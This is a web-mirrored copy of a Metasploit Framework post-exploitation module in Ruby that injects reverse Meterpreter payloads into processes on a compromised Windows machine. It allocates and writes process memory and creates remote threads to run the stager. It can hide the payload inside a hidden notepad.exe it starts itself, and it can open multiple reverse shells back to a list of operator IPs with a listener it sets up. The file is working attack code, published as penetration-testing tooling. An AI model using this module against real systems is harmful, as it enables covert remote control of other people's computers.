Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/manage/multi_meterpreter_inject.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Post
7
8
def initialize(info = {})
9
super(
10
update_info(
11
info,
12
'Name' => 'Windows Manage Inject in Memory Multiple Payloads',
13
'Description' => %q{
14
This module will inject into several processes a given
15
payload and connect to a given list of IP addresses.
16
The module works with a given lists of IP addresses and
17
process IDs if no PID is given it will start the given
18
process in the advanced options and inject the selected
19
payload into the memory of the created module.
20
},
21
'License' => MSF_LICENSE,
22
'Author' => [
23
'Carlos Perez <carlos_perez[at]darkoperator.com>',
24
'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>' # added multiple payload support
25
],
26
'Platform' => [ 'win' ],
27
'SessionTypes' => ['meterpreter'],
28
'Compat' => {
29
'Meterpreter' => {
30
'Commands' => %w[
31
stdapi_sys_process_attach
32
stdapi_sys_process_execute
33
stdapi_sys_process_memory_allocate
34
stdapi_sys_process_memory_write
35
stdapi_sys_process_thread_create
36
]
37
}
38
},
39
'Notes' => {
40
'Stability' => [CRASH_SERVICE_DOWN],
41
'SideEffects' => [],
42
'Reliability' => []
43
}
44
)
45
)
46
47
register_options(
48
[
49
OptString.new('PAYLOAD', [false, 'Payload to inject in to process memory', 'windows/meterpreter/reverse_tcp']),
50
OptInt.new('LPORT', [false, 'Port number for the payload LPORT variable.', 4444]),
51
OptString.new('IPLIST', [true, 'List of semicolon separated IP list.', Rex::Socket.source_address('1.2.3.4')]),
52
OptString.new('PIDLIST', [false, 'List of semicolon separated PID list.', '']),
53
OptBool.new('HANDLER', [false, 'Start new exploit/multi/handler job on local box.', false]),
54
OptInt.new('AMOUNT', [false, 'Select the amount of shells you want to spawn.', 1])
55
]
56
)
57
58
register_advanced_options(
59
[
60
OptString.new('PROCESSNAME', [false, 'Description', 'notepad.exe'])
61
]
62
)
63
end
64
65
def run
66
unless session.platform == 'windows' && [ARCH_X64, ARCH_X86].include?(session.arch)
67
print_error('This module requires native Windows meterpreter functions not compatible with the selected session')
68
return
69
end
70
71
hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
72
print_status("Running module against #{hostname} (#{session.session_host})")
73
74
# Set variables
75
multi_ip = nil
76
multi_pid = nil
77
78
if datastore['HANDLER']
79
create_multi_handler(datastore['PAYLOAD'], datastore['LPORT'])
80
end
81
82
multi_ip = datastore['IPLIST'].split(';')
83
multi_pid = datastore['PIDLIST'].split(';')
84
85
datastore['AMOUNT'].times do # iterate through number of shells
86
multi_ip.zip(multi_pid).each do |a|
87
# Check if we have an IP for the session
88
payload = create_payload(datastore['PAYLOAD'], a[0], datastore['LPORT'])
89
if a[1]
90
inject(a[1], payload)
91
else
92
# if no PID we create a process to host the Meterpreter session
93
pid_num = start_proc(datastore['PROCESSNAME'])
94
inject(pid_num, payload)
95
end
96
select(nil, nil, nil, 5)
97
end
98
end
99
end
100
101
# Function for injecting payload in to a given PID
102
#-------------------------------------------------------------------------------
103
def inject(target_pid, payload_to_inject)
104
print_status("Injecting meterpreter into process ID #{target_pid}")
105
106
host_process = session.sys.process.open(target_pid.to_i, PROCESS_ALL_ACCESS)
107
raw = payload_to_inject.generate
108
mem = host_process.memory.allocate(raw.length + (raw.length % 1024))
109
110
print_status("Allocated memory at address #{'0x%.8x' % mem}, for #{raw.length} byte stager")
111
print_status('Writing the stager into memory...')
112
host_process.memory.write(mem, raw)
113
host_process.thread.create(mem, 0)
114
print_good("Successfully injected Meterpreter into process: #{target_pid}")
115
rescue StandardError => e
116
print_error("Failed to inject payload into #{target_pid}!")
117
print_error(e.message)
118
end
119
120
# Function for Creation of Connection Handler
121
#-------------------------------------------------------------------------------
122
def create_multi_handler(payload_to_inject, rport, rhost = '0.0.0.0')
123
print_status("Starting connection handler at port #{rport} for #{payload_to_inject}")
124
mul = client.framework.exploits.create('multi/handler')
125
mul.datastore['WORKSPACE'] = session.workspace
126
mul.datastore['PAYLOAD'] = payload_to_inject
127
mul.datastore['LHOST'] = rhost
128
mul.datastore['LPORT'] = rport
129
mul.datastore['EXITFUNC'] = 'process'
130
mul.datastore['ExitOnSession'] = false
131
132
mul.exploit_simple(
133
'Payload' => mul.datastore['PAYLOAD'],
134
'RunAsJob' => true
135
)
136
print_good('exploit/multi/handler started!')
137
end
138
139
# Function for Creating the Payload
140
#-------------------------------------------------------------------------------
141
def create_payload(payload_type, lhost, lport)
142
print_status("Creating a reverse meterpreter stager: LHOST=#{lhost} LPORT=#{lport}")
143
payload = payload_type
144
pay = client.framework.payloads.create(payload)
145
pay.datastore['LHOST'] = lhost
146
pay.datastore['LPORT'] = lport
147
return pay
148
end
149
150
# Function starting notepad.exe process
151
#-------------------------------------------------------------------------------
152
def start_proc(proc_name)
153
print_good('Starting Notepad.exe to house Meterpreter Session.')
154
proc = client.sys.process.execute(proc_name, nil, { 'Hidden' => true })
155
print_good("Process created with pid #{proc.pid}")
156
return proc.pid
157
end
158
end
159
160